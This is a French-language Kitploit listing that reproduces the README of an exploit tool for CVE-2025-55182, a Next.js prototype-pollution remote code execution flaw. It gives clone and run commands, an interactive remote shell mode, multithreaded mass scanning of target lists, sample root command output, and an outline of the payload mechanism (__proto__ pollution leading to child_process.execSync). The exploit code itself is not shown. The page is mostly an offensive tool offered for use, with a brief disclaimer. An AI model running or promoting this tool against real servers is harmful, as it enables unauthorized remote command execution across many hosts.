Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-React2shell — Outil d'exploitation CVE-2025-55182 – Exploit Python 2.7 pour une pollution de prototype Next.js menant à une RCE | Kitploit
Outils/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

Outil d'exploitation CVE-2025-55182 – Exploit Python 2.7 pour une pollution de prototype Next.js menant à une RCE

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
61il y a 2 moisPas encore vérifié

CVE-2025-55182 - React2shell

Un exploit Python 2.7 pour CVE-2025-55182 – une vulnérabilité critique de pollution de prototype / exécution de code à distance (RCE) dans les applications Next.js.
Cet outil permet à la fois un shell interactif sur cible unique et un scan de masse de plusieurs hôtes avec multithreading, sortie colorée et repli automatique vers HTTPS.


🚀 Fonctionnalités

  • ✅ Shell interactif pour cibles uniques – exécute des commandes système arbitraires
  • ✅ Scan de masse à partir d'une liste de fichiers – multithreadé, rapide, résultats sauvegardés automatiquement
  • ✅ Détection automatique – URL unique → mode shell, fichier existant → mode scan de masse
  • ✅ HTTPS automatique – ajoute https:// si aucun protocole n'est fourni
  • ✅ Écriture thread-safe – sauvegarde les résultats vulnérables en temps réel
  • ✅ Commandes personnalisées – change la commande par défaut id en n'importe quelle commande (whoami, ls, etc.)
  • ✅ Aucune dépendance externe – seulement requests (facile à installer)

📋 Prérequis

  • Python 2.7 (l'outil est spécifiquement écrit pour Python 2.7)
  • Bibliothèque requests – installez‑la avec :
    root@kitploit:~
    pip install requests
    

· Un terminal supportant les couleurs ANSI (la plupart des terminaux Linux/macOS, Windows Terminal, PowerShell)


📦 Installation

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

Rendre le script exécutable (optionnel) :

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 Utilisation

1. Shell interactif (cible unique)

root@kitploit:~
python2 CVE-2025-55182.py https://target.com

ou sans protocole (HTTPS est ajouté automatiquement) :

root@kitploit:~
python2 CVE-2025-55182.py target.com

Une fois connecté et vérifié vulnérable, vous obtenez une invite de shell :

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

Commandes intégrées :

  • exit / quit – fermer le shell
  • clear – effacer l'écran
  • help – afficher l'aide

2. Scan de masse (liste de cibles)

Préparez un fichier avec une cible par ligne (avec ou sans http/https) :

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

Lancez le scan de masse (par défaut : 10 threads, commande id, fichier de sortie res.txt) :

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

Personnalisez les threads, la commande et le fichier de sortie :

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
  • 20 – nombre de threads
  • whoami – commande à exécuter sur chaque cible vulnérable
  • results.txt – fichier de sortie (seules les entrées vulnérables sont sauvegardées)

Exemple de sortie du scan de masse :

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

Résultats sauvegardés (res.txt) :

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 Comment ça fonctionne

L'exploit envoie une requête multipart/form-data fabriquée à un point d'accès Next.js (/login est ajouté si le chemin est vide).
Il abuse de la pollution de prototype (__proto__:then et constructor:constructor) pour injecter un préfixe malveillant qui exécute une commande système à l'aide de child_process.execSync().

Le serveur répond avec une redirection 303 contenant la sortie de la commande dans l'en-tête x-action-redirect (ou Location). L'outil extrait le résultat depuis /login?a=<sortie>.


🛡️ Avertissement

Cet outil est destiné à des fins éducatives et aux tests de sécurité autorisés uniquement.
L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.
Vous devez avoir une autorisation écrite explicite du propriétaire du système cible avant d'utiliser cet exploit.

Vous pouvez consulter l'avertissement complet sur la couverture de Jenderal92. Rendez-vous ICI !!!

Télécharger l’outil